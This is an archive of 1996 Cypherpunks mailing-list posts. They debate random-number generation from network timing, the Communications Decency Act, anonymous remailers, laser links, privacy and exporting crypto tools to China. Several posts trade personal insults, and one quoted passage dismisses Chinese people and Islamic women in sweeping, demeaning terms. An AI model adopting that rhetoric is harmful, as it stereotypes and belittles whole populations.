>key or whatever.
>
>If you want the source code please post a request or e-mail me. If you
>think for some reason that using this method is a bad idea, I would like
>to know.

To paraphrase, anyone who thinks he can get truly random numbers from Unix
boxes and network timing info is living in a state of sin.

More helpfully, I suggest you do several things:

1. Several textbooks discuss the problems implicit in generating
pseudorandom and "pretty random" numbers. Easier to read what others have
thought about than to spend time writing code that is flawed conceptually.

2. The CP list has discussed RNGs many, many,..., many times. Consult the
archives for a sampling.

3. If network and machine timings have to be used, other people have
written programs that do this. I think Matt Blaze's package includes at
least one such program.

4. I'd avoid altogether phrases such as "generates random numbers," unless
your method uses radioactive decay or Johnson noise measurements, for
example, and maybe not even then.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sun, 18 Feb 1996 08:05:27 +0800
To: Sten Drescher <stend@grendel.texas.net>
Subject: Re: A Cyberspace Independence Refutation
Message-ID: <199602172323.PAA01754@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


jamesd@echeque.com said:
>
>j> 1.  President Clinton declared CDA unconstitutional and directed
>j> the Justice department to refrain from enforcing it.

At 01:57 PM 2/16/96 -0600, Sten Drescher wrote:
>	Then why is the Justice Department defending it? 

Sorry:  My error.  As you pointed out he ruled *part* of the
CDA unconstitutional -- a part that no one expected to be
enforced anyway
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 18 Feb 1996 08:11:27 +0800
To: cypherpunks@toad.com
Subject: CyberManicheans (was Re: CyberAngels)
Message-ID: <199602172335.PAA06490@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


"declan+@CMU.EDU" or someone using that identity has written:

  I fear the so-called "CyberAngels" more than I do the Feds.
  At least with their brand of jackboots, there can be
  accountability.

  The CyberAngels are more like CyberCads, CyberFrauds, or   CyberCriminals.

Cyber-vigilantes?

Odd that their home page has a blue-ribbon.  They don't seem to
understand what the hell they are doing... it's not a requirement
that ISPs require online presence to be verifiable anyway.

Even if you're ISP operator knows who you are, it doesn't follow
that it's definitely YOUR presence in a usenet post or on IRC.
There's plenty of semi-anonymity on the net without using things
like remailers or "decense" protocols or DC-Nets.

Under their logic, we should all have little bar codes implanted
in our skulls and checked at every street crossing and doorway.

There's also a difference between rudeness and criminal activity.

Anonymity isn't a cause of crime.  It's icing on the cake, and
criminals will find a variety of other ways around validated
User-ID at the ISP level anyway.... which lulls one to a false
sense of security, since once you're got a legitimate-appearing
ID for your ISP, you can do quickie hit-and-run "cybercrimes"
and fall off the face of the earth anyway.

There's just so much an ISP or even a clerk at a department store
can do to verify your identity.  One store I know doesn't accept
checks from Post Boxes, believing that they are all-too-often
used for fraud... but a street address from a fly-by-night mail
box rental is undetectable by them.

The Cyber Angels are just as clueless as the authors of the
CDA.

Cheers,
[***CENSORED***]








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 18 Feb 1996 08:23:49 +0800
To: cypherpunks@toad.com
Subject: CyberManicheans (was Re: CyberAngels)
Message-ID: <199602172345.PAA07005@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


"declan+@CMU.EDU" or someone using that identity has written:

  I fear the so-called "CyberAngels" more than I do the Feds.
  At least with their brand of jackboots, there can be
  accountability.

  The CyberAngels are more like CyberCads, CyberFrauds, or   CyberCriminals.

Cyber-vigilantes?

Odd that their home page has a blue-ribbon.  They don't seem to
understand what the hell they are doing... it's not a requirement
that ISPs require online presence to be verifiable anyway.

Even if you're ISP operator knows who you are, it doesn't follow
that it's definitely YOUR presence in a usenet post or on IRC.
There's plenty of semi-anonymity on the net without using things
like remailers or "decense" protocols or DC-Nets.

Under their logic, we should all have little bar codes implanted
in our skulls and checked at every street crossing and doorway.

There's also a difference between rudeness and criminal activity.

Anonymity isn't a cause of crime.  It's icing on the cake, and
criminals will find a variety of other ways around validated
User-ID at the ISP level anyway.... which lulls one to a false
sense of security, since once you're got a legitimate-appearing
ID for your ISP, you can do quickie hit-and-run "cybercrimes"
and fall off the face of the earth anyway.

There's just so much an ISP or even a clerk at a department store
can do to verify your identity.  One store I know doesn't accept
checks from Post Boxes, believing that they are all-too-often
used for fraud... but a street address from a fly-by-night mail
box rental is undetectable by them.

The Cyber Angels are just as clueless as the authors of the
CDA.

Cheers,
[***CENSORED***]








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 18 Feb 1996 06:48:20 +0800
To: maruishi@netcom.com
Subject: Re: True random numbers
Message-ID: <ad4b96ea00021004addb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:13 PM 2/17/96, maruishi@netcom.com wrote:
>I think you are probably right when you say that it is not truely random.
>I don't think I thought about it very much, but this method does produce
>a kind of a pseudo random numbers.

Yes, it produces a "kind" of pseudo random number...the problem is
determining which "kind" it is and whether it is sufficient for the planned
use. The Netscape RNG also produced a "kind" of pseudo random number
generator...but it was insufficient, as events showed.

>    But I think it would be really hard to simulate this method because
>if you send data to a network way out there in Europe then all the
>machines in between can cause the tranmission to slow down or spend up
>depending on the type of lines nad CPU load etc...

If by "simulation" you mean "prediction," I agree. I agree that predicting
the next bit in a sequence might be hard. (But "hard" is a slippery term,
and the history of crypto is littered with the corpses of systems that
seemed to be hard but weren't.)

However, even predicting the next bit with 50.0001% accuracy might be
sufficient to reduce the work factor in an attack by many orders of
magnitude.

And some attacks might rely on the overall statistics of the bits, not just
the ability to predict the nth bit.

Again, there's a huge literature on this.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sun, 18 Feb 1996 06:19:35 +0800
To: jamesd@echeque.com
Subject: Re: Spin Control Alert (LI Newsday, 2/12/96)
In-Reply-To: <199602150552.VAA09945@news1.best.com>
Message-ID: <8l9Ysoa00bkSQ_u5Ft@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 14-Feb-96 Re: Spin Control Alert (LI
.. by jamesd@echeque.com 

> Name this Christian rightist who drafted or defended the CDA!

It wasn't one member of the religious right who supplied the legal
arguments to defend the CDA. Multiple religious righters were involved.
Try Deen Kaplan, John McMickle, and Bruce Taylor, for starters.

McMickle, a protege of Taylor's, *wrote* Sen. Chuck Grassley's
net.indecency legislation. McMickle is a longtime anti-porn activist and
worked in an office shared by the National Law Center, the National
Coalition Against Pornography, and Enough is Enough! McMickle now works
for Grassley.

> The primary anti porn activists involved in the effort to regulate the net
> were Donna Reed, and Marty Rimm, neither of whom are members of the
Christian 

Wrong. You are confusing what Enough is Enough! *purports* to be with
what it really is. I have written in earlier messages how Dee Jepsen
(Donna Rice's boss at Enough is Enough!) is affiliated with Pat
Robertson and other right-wing religious fanatics. (Robertson, the
founder of the Christian Coalition, said in 1993 that separation of
church and state is "a lie of the left," and "there is no such thing in
the Constitution.")

As for Marty, he's *not* an anti-porn activist. He loves porn! He was
used by the anti-porn activists to promote their agenda, and he used
them to promote himself. (If you have *any* evidence that he's an
anti-porn activist himself, I need to see it ASAP. His study was
attached to the DoJ's reply brief in our CDA lawsuit.)

> right, and Bill Arms, who is not only not a member of the Christian right,
> but who in additon is a PC academic.

Wrong. Incredibly wrong. Do you *know* who Bill Arms is? Have you ever
spoken with him, met with him, or debated him? I have. Arms is a former
vice president for computing services at CMU and was in *no* way
involved with the "effort to regulate the net." At best, he was a fall
guy for the censorship attempts here at CMU. (He had already been forced
to resign.)

James, to say anything else is a fantasy. Please tell me how exactly
Arms was involved in this telecom legislation's "effort to regulate the
net." Documentation, please.

> While their campaigns received assistance, encouragement, and free labor
> from the Christian right, it was not the Christian right that enabled these
> people to exercise the disproportionate power and influence that they did.

The media's gullibility allowed the religious right to promote their
agenda. Cyberporn scares play better than arguments about free speech.

> It was not the Christian right that obtained totally undeserved publicity 
> for Rimm's spurious findings.

Wrong. Kaplan was an editor at the Georgetown Law Journal and pushed
through the approval of Rimm's study, bypassing normal channels, which
prompted TIME to run the cover. Kaplan is a vice president at the
National Coalition for Children and Families (with McMickle and Taylor),
formerly called the National Coalition Against Pornography. Oh, and the
NCAP/NCCF folks wrote Rimm's footnotes for his study.

> Rimm's study had connections both with the right and the left, but the real
> question is where the big muscle came from.  If the big muscle came from

Wrong. Rimm's study had only minor connections with the left. Catharine
MacKinnon was the only substantial "left" contact Rimm had, and she has
spoken *against* the CDA! If you know more, please share it with us.

> the Christian right they would have let us know by now, because they always
> tend to exaggerate their influence and power.

Wrong. The big muscle did come from the religious right, but it is *not*
in their interests to advertise it since it would invalidate Rimm's
study even more. (Grassley called Rimm's study, on the Senate floor, an
impartial one by a respected university, not by an advocacy group.)
Since Rimm's study still has legs, the religious right has kept their
mouths shut.

> While the effort to regulate the net had *links* to the Christian right, it
> is simply untrue to say that it was composed of the Christian right, or even
> to say that the Christian right played a significant role in the
effort.  Thei
> r
> role is scarcely visible.  They were minor foot soldiers.

Wrong. James, I'm afraid you just don't know what you're talking about.
The religious right orchestrated and organized the effort. Check out:
     http://www.cs.cmu.edu/~declan/rimm/docs/godwin.3

In that article, Mike writes that Bruce Taylor "continues to spearhead
the attempts to pressure Congress into censoring the Internet" and "in
the long run, one thing has become certain -- that the 'problem' of
pornography on the Net is essentially one that was constructed by Rimm
and the antiporn activists, differing in agendas but united in their
tactics." Mike also has an article in an upcoming Penthouse that will
reveal even more.

I've also written at length about the Rimm study at:
     http://www.cs.cmu.edu/~declan/

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Sun, 18 Feb 1996 06:19:32 +0800
To: cypherpunks@toad.com
Subject: Credentials ?
Message-ID: <960217165743.20220a2a@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


Ed rites:
> Even with the manned entrances, the ones with just a
>receptionist/secretary, they seldom check that the picture matches the one
>on the badge, so even if they've invalidated the badge, the receptionist
>will still more than likely let you into the place if you wave your
>keycard/badge around. 

People have *always* been the weak link in spite of the fact that "personal
recognition" is considered best.

Back in the days of high compression engines measured in hundreds of cubic 
inches rather than bottle sizes, everyone who worked at the Cape (Canaveral,
Kennedy, whatever) had a pack of Winstons in the car. The back entrance
was through a drawbridge, a sweeping right turn, and then a short straight
to the guardboxes at the entrance. 

When the bridge was up, a considerable amount of 28 cents/gal Sunoco 260 
waited for the bars to raise. Unleashed, a small block could be wound up
pretty good by the gate. Seems that a pack of Winstons (white rectangle over
red rectangle) at 40+ looked just like a Secret badge.

							Warmly,
								Padgett

ps Tim was correct, believe I *registered* Libertarian that year - do remember
   not getting invited to vote in any primaries.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Sun, 18 Feb 1996 07:41:09 +0800
To: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Subject: Re: Using lasers to communicate
Message-ID: <2.2.32.19960217230344.006adfa0@204.248.40.2>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 05:07 PM 2/17/96 -0500, cypherpunks@toad wrote:

>> Depends upon how paranoid you want to be.  A small radio-controlled
>> helicopter is available cheaply at Radio Shack, and might even be
>> capable of holding a receiver, re-transmitter and recorder.
>
>If I wanted to intercept a laser beam I'd spray an aerosol mist
>into the beam and look at the scatter.  On a dusty or humid day I
>might not need the aerosol.
>
>Why not just encrypt the link?  Then anyone can tap and it doesn't matter.
>I'm in the process of building a tightbeam microwave link that can carry
>2 Mbps over 50Km.  Anybody got any gunn transceivers they don't need?

If you have a secure link you don't need encryption.  Arguably, the
converse is true; if you have secure encryption you don't need
a secure link.  Isn't the ability to transmit secure data over
insecure channels one of the primary justifications for encryption?

dave



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMSZeJjVTwUKWHSsJAQEhswf/Xm1QwUTrBkzYWmbBu0+c4qkBXUfZR1Ck
DEzgpuBMhGV/2YO+654AwEKBMK7u91J/I8mkl6h84UIclrBUydmmh2N0m34qlZRi
4R6KdFR0w80WsvTAcX+qJoACLrf9JsrLq03Y1lytSdVYxax6NWIY+OXOQBf36xCp
aSq5+HYe3498+9QQEho+LpKw3A84bWPYjh5sFBheffgf6mpbsY+Tu3/fhDOESuGc
ZjBLcjNlUtZ9IYnD+dzlAJBH04Lpgigfqjj5ZkGV04Q+jgumO8+HZbE+ymJnhfX7
G4KcPESnkpcK0JaiEVJtiKA5Eh2Ur8J8MUXxou4QY4j44md22v8aZw==
=qyyj
-----END PGP SIGNATURE-----
-----
David E. Smith,  c/o Southeast Missouri State University
1000 Towers Circle South MS 1210 Cape Girardeau MO 63701
dsmith@midwest.net, dsmith@alpha.c2.org,  PGP 0x961D2B09
(573)339-3814    http://www.midwest.net/scribers/dsmith/
"Reality is only for those lacking in true imagination."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Sun, 18 Feb 1996 06:32:00 +0800
To: dsmith@midwest.net (David E. Smith)
Subject: Re: Using lasers to communicate
In-Reply-To: <2.2.32.19960217173350.0067d5b4@204.248.40.2>
Message-ID: <96Feb17.170738edt.666@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> >An interception device will stick out like dogs balls.  Whoever wants to tap
> >my line is going to have to build a tower.
> 
> Depends upon how paranoid you want to be.  A small radio-controlled
> helicopter is available cheaply at Radio Shack, and might even be
> capable of holding a receiver, re-transmitter and recorder.


If I wanted to intercept a laser beam I'd spray an aerosol mist
into the beam and look at the scatter.  On a dusty or humid day I
might not need the aerosol.

Why not just encrypt the link?  Then anyone can tap and it doesn't matter.
I'm in the process of building a tightbeam microwave link that can carry
2 Mbps over 50Km.  Anybody got any gunn transceivers they don't need?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Sun, 18 Feb 1996 07:21:31 +0800
To: cypherpunks@toad.com
Subject: Re: True random numbers
Message-ID: <199602172254.RAA23828@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

maruishi@netcom.com wrote:
> 
> I was trying to think of a way to come up with true random numbers...
> And knowing a bit of UNIX socket TCP/IP programming I made a small [..]

I wouldn't trust the samples taken from networked sources.  You're better
off with a kernel patch that samples from local sources directly like 
disk or keyboard timing variations... such patches already exist, with 
similar drivers developed for DOS and OS/2 systems as well.

Check the archives.

Rob.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSZciyoZzwIn1bdtAQFhJgF+Pu/sPUlHoppfz8ZVp9Fb5vRgERuw+cIL
eabKLlR6wN6Ey+HukIxdWNAVBDuIjDa0
=C8h7
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Sun, 18 Feb 1996 07:40:05 +0800
To: cypherpunks@toad.com
Subject: Re: Credit cards - Privacy - Unique Situation
Message-ID: <199602172258.RAA23847@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Rick Tait wrote:
> 
> Being a British guy recently moved to the USA, I may be in a unique
> situation in being able to protect my privacy, and I was wondering if
> fellow cypherpunks may be able to give me some hints in being to
> "protect" myself...
> 
> Since my SSN is barely a month old, since I don't yet have a credit card
> over here, since I won't (yet?) be in many of those beloved databases, what
> steps can I take to "hide" myself before it's too late? Too all intents and
> purposes, I have metamorphed from a newborn US baby into an adult,
> overnight. Thus I have an SSN, I pay tax (etc), but I'm not on anyone's
> direct mailing lists.[..]

Depends on how much you're in British databases. I imagine that when
those who desire to track your movements feel the need they'll check
with UK and European sources.

A lot of the databases are already linked up and shared. An acquaintance
from the UK who came here several years ago was able to use his debit
card in local ATMs, for instance.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSZdiSoZzwIn1bdtAQERMQF+KW+TYNLJA5GO1VLxonngp0bEHx80OVOn
Y3+dr1f/did4h1VkFsyqpy0a3ZI7hnEe
=KF7W
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Peponis" <mianigand@unique.outlook.net>
Date: Sun, 18 Feb 1996 10:06:56 +0800
To: wlkngowl@unix.asb.com
Subject: Re: Remailers Pose Risk
Message-ID: <199602180141.TAA05719@unique.outlook.net>
MIME-Version: 1.0
Content-Type: text/plain


>    Computerworld, February 12, 1996, Front page:
>    "Anonymous remailers have a lot of nasty potential," said
>    Stephen T. Kent, chief scientist for security technology at

>So do kitchen knives or automobiles.

So do brain-dead journalists and "security experts".  Oops, take that back, no 
probability involved, they are nasty problems.

[..]

>    One snowy day last month, for example, about 25% of the
>    workforce at a defense contractor in Rockville, Md., went
>    home after they received a bogus E-mail message dismissing
>    them for the day. The message originated from an anonymous
>    remailer that allowed the user to impersonate a senior
>    company official.

:Was that a remailer or simply forged mail?

How long have people been bitching about putting digital signatures on stuff 
like that.  If it was signed, it could of been verified if indeed it was legit 
or not.

Irregardless of where it came from, anybody stupid enough to believe everything 
they read, without checking out it's validity, deserves what they get.

[..]
>    "As in the case of smallpox, yellow fever, flu epidemics,
>    AIDS or malaria, it will take disasters before the public
>    may accept that some forms of restrictions on the
>    electronic freedom of speech and  that  privacy may be
>    worthwhile."FNORD!

What?? like anonymous electronic media spreads the disease somehow.  To the 
person who wrote the article, you have proved beond a shadow of a doubt that 
you are dense as a brick.  Wrong type of virus, you mean the other kind.

>    Do's and don'tsAhem
>    Unethical or illegal uses of anonymous remailers:[..]
>    -  To violate copyright laws ... Scientology...
>    -  To encourage others to commit unethical or illegal
>       behavior

Oh Boo Hoo, the moral decay of society, that is your problem shithead, not 
mine, some of us survive no matter what happens to the rest of you.
Regards,
Michael Peponis
PGP Key Avalible form MIT Key Server,or via finger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Peponis" <mianigand@unique.outlook.net>
Date: Sun, 18 Feb 1996 10:09:53 +0800
To: cypherpunks@toad.com
Subject: Legal status of Indian Reservations and CDA
Message-ID: <199602180141.TAA05716@unique.outlook.net>
MIME-Version: 1.0
Content-Type: text/plain


If I remember correctly, are not American Indian reservations considered 
qusi-sovergin states under the law?

If this is true, what would stop me from negotiating with some tribe to 
establish an ISP on the reservation and then placing whatever material I wanted 
on that site without fear of reprisals from the US goverment.

After all, if they are a soveign state, decency is covered by whatever laws 
they have, if any, not the CDA.

If this is true, the Indians get the benift of having state-of-the-art 
telecommunications in thier communities, plus residual job creation, and 
everyone else gets freedom of speech.

Any comments?
Regards,
Michael Peponis
PGP Key Avalible form MIT Key Server,or via finger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Sun, 18 Feb 1996 07:55:50 +0800
To: cypherpunks@toad.com
Subject: Risks of a style anonymizer?
Message-ID: <199602172305.SAA23887@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

One risk of "style anonymizers", though: if the style becomes too generic
it's just another levelling of readability.  Usenet and mailing lists can
become that much more boring, if not stupidified with too many spelling
erros and grammatical abuses.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSZfQyoZzwIn1bdtAQF47QGAkP5+ti0j6KyJg8KY1ei1dF9Yz8FAnz4b
EjB4r6nMXDW2wBG7ZnpFkX1YO6Aezmte
=vrAk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sun, 18 Feb 1996 07:54:33 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Spin Control Alert (LI Newsday, 2/12/96)
In-Reply-To: <01I18USFWHX0A0V2IC@mbcl.rutgers.edu>
Message-ID: <Il9Zzim00bkSQ_u4Y5@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


A lawsuit against the atheist would not be effective and could result in
a countersuit for abuse of process.

-Declan


Excerpts from internet.cypherpunks: 15-Feb-96 Re: Spin Control Alert (LI
.. by "E. ALLEN SMITH"@mbcl.ru 
>         How about a lawsuit by the atheist against the site? Since the CDA
> claims that such material is harmful, and tries to make it illegal, such a
> lawsuit would appear to have grounds - especially if the atheist has a child
> that is "surfing the Net." Now, they're unlikely to _win_, but the atheist
> can cost them some money _and_ make the CDA look stupid. If I were in the
> American Atheist Foundation or some such, I'd do such a lawsuit against a
> Christian Right organization that had supported the CDA.
>         Of course, the selective enforcement will be a good argument in favor
> of the law being unconstitutional.
>         Crypto relevance? Criminal laws aren't the only things that a
> crypto-anarchial system will make less effective. Civil lawsuits
(under things
>  
> like libel) also will be. I'd call this a good change.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Sun, 18 Feb 1996 08:22:07 +0800
To: cypherpunks@toad.com
Subject: Re: China -- the fragile glimmer of freedom
Message-ID: <199602172346.SAA50832@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[Warning! This post is not primarily about "writing code." Instead,
it's about cypherpunks "spreading crypto."]

Tim May [& usually I agree with him] wrote:

>At 12:10 AM 2/16/96, Bryce wrote:
>...

<snip>

>>Perhaps you think that the compliant Chinese person is
>>satisfied with his or her role as lackey of his government?
>>Or is it that we and the Asians inhabit such different
>>worlds that we will have to make do without each other's
>>help?
>
>Well, where are the posts from outraged Cypherpunks living in the People's
>Republic of China?

Obviously, there aren't any. (Being an outraged cypherpunk in the PRC
would no-doubt be harmful to the outraged cypherpunk's health.)

>Some countries are so far gone, so deep in the muck of statism, that
>nothing their governments do is very surprising.  Ranting about how bad
>things are in some country is not very meaningful. Supplying them with
>tools is more meaningful. However, given that I know of no list members
>living in the PRC, nor even any in soon-to-be-assimilated Hong Kong, I'm
>not sure what the point is.

I think that the goal here is to try to generate just one small group of
cypherpunks in Hong Kong, who plan to stay on after the occupation. They
will necessarily be very brave people, but IMO brave people _are_ there.
I won't say bravery of that sort is common, but there are many people
in China, and we all remember the guy who stood there in front of the
tank...IMO remailer technology transfers will be _at least_ as important
to this [admittedly ambitious] goal as direct crypto transfers are, as
traffic-analysis is _VERY useful_ to the surveilance state. When the
"remailer-in-a-box" is finished by a friend of mine "Real Soon Now" (tm)
I hope that the directions to it are translated and that it is widely
distributed [legally, of course]. ;)

>I don't know about others, but I think the focus should be on the folks who
>are salvageable, not the billion or so Chinese or the hundreds of millions
>of Islamic women awaiting their clitorectomies and bowing toward Mecca for
>guidance.

Tim, you're giving up too quickly on most of the rest of the planet.
As long as repression ever works somewhere, statists will attempt to
(selectively) use annoying examples of how "orderly" it makes life.

It's a one-way ratchet: When a moron bombs a building here, the US
politicians cancel a repeal of the "assault weapons" ban. When some
moron plants a bomb in London (or Paris) their politicians' reaction
is not exactly the reverse...

>Fact is that 90%+ of all list members are in the United States, and 97%+
>are in the so-called "Western world." We have a chance to deploy strong
>crypto, the residents of Nepal and Singapore do not.

I think that these statistics are likely correct, but I think it's not
important, and we can't just give up this easily...We already know that
China will be swallowing Hong Kong, a haven of capitalism, and IMHO we
should work to make this process as "interesting" as possible. Anonymity
is likely to upset the Chinese authorities as much as it upset the CO$.

I know nobody in Hong Kong who will be staying, but I'm sure that some
people on this list do, and Hong Kong is likely to be a better place for
us to "infiltrate" than Beijing. Time is short, but if the fax machine
gave us Tienanmen(sp?) I am optimistic about e-mail. Singapore residents
(at least, those with a hankering for chewing-gum) might feel they have
a reason to help us, if we simply try to be polite when we ask for help
in putting together a good-looking Trojan Horse.
JMR [who is even now preparing for the flames.]

<snip>

- ------------------------------------------------------------------------
Regards, Jim Ray <liberty@gate.net> Boycott espionage-enabled software!

"If I had to summarize [Republican candidate Morry] Taylor's campaign
 message, I'd boil it down to two basic points:
1. The problem with this country is that the government is run by lawyers.
2. And these are *stupid* lawyers."  --  Dave Barry 2/17/96
_______________________________________________________________________
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Public Key id. #  E9BD6D35  http://www.shopmiami.com/prs/jimray IANAL
_______________________________________________________________________



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMSZoUG1lp8bpvW01AQGsrAP/QdUrjiSoZ5avWu7MvdNDS5BMhv/WJecR
MTbgwrAbrKa9TTw+kFifzdiMeJtldmwSyhAvskshfLHWtAl/RjWm7+Et6NcJeeZV
nDoAljQNmU+xDM0jPGSu4PvkxNxndqbd3TiDOkfYtjLO16T+yA31j16RPiqjnG4C
YWbM6iCvTJw=
=Sq8a
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Farber <farber@central.cis.upenn.edu>
Date: Sun, 18 Feb 1996 08:37:58 +0800
To: stend@grendel.texas.net>
Subject: Re: A Cyberspace Independence Refutation
Message-ID: <2.2.32.19960217235252.00ce4398@linc.cis.upenn.edu>
MIME-Version: 1.0
Content-Type: text/plain


The President can not rule anything unconstitutional. He can tell justice
not to enforce it but sometime local federal prosecutors do what they want
and some future administration can decide to enforce it. Only the courts or
the congress can change things for sure.

Dave

At 03:20 PM 2/17/96 -0800, jamesd@echeque.com wrote:
>jamesd@echeque.com said:
>>
>>j> 1.  President Clinton declared CDA unconstitutional and directed
>>j> the Justice department to refrain from enforcing it.
>
>At 01:57 PM 2/16/96 -0600, Sten Drescher wrote:
>>	Then why is the Justice Department defending it? 
>
>Sorry:  My error.  As you pointed out he ruled *part* of the
>CDA unconstitutional -- a part that no one expected to be
>enforced anyway
> ---------------------------------------------------------------------
>              				|  
>We have the right to defend ourselves	|   http://www.jim.com/jamesd/
>and our property, because of the kind	|  
>of animals that we are. True law	|   James A. Donald
>derives from this right, not from the	|  
>arbitrary power of the state.		|   jamesd@echeque.com
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sun, 18 Feb 1996 08:39:54 +0800
To: cypherpunks@toad.com
Subject: Re: Libertarians and crypto and such
Message-ID: <199602180001.TAA03070@pipe9.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 16, 1996 23:06:27, 'Bruce Baugh <bruce@aracnet.com>' wrote: 
 
 
>At 12:43 AM 2/17/96 -0500, tallpaul wrote: 
> 
>>While the LP or its majority may not call for the things I've critiqued, 
>>certainly libertarians have. Nor, as far as I can recall, have LPers 
>>repeatedly posted to the cypherpunk list material that is on-the-surface
at 
>>least significantly off-topic; libertarians have. And I responded.  
> 
>So you get the fun of attacking this straw man called "libertarians"
without 
>any responsibility to identify any actual people it might include other
than 
>a handful of folks that the vast majority of us think are kooks. And
you've 
>also acquired the remarkable mental power, apparently, to discern who is
or 
>is not an LP member based on their posts here. 
> 
 
Libertarians are not "straw men." They actually exist. I've seen them with
my own eyes. 
 
If B. Baugh is upset that I have not mentioned any of the other
libertarians (olf the cypherpunk list) that I have criticized, I would be
happy to re-post to the list all of the related messages in other news
groups on this topic listing their names. My "sent mail" archives contain a
few thousand messages. (Aside to T.C. May: this is sarcasm and rhetorical
hyperbole.) 
 
The vast majority of the libertarians on the cypherpunk list *might* think
that the people I've criticized are "kooks" but I can find no evidence of
this. I do note that some people who call themselves "libertarians" have so
criticized the "kooks." 
 
The second point is, I think, either an error in logic. I have written
nothing about my ability to tell what political party someone belongs or
does not belong to. I infer that when someone tells me they are a member of
the LP, CPUSA, SPUSA, etc. that they are, until evidence dictates another
conclusion. If someone is a party member and decides not to make the
material public, then they, not I, are responsible for any transient
confusion that develops. But I do not demand or expect people to
automatically list their party affiliation. I do note that the declared
ability to "discern" unannounced party membership has historically been far
more a rightwing then leftwing "ability" in the U.S.A. 
 
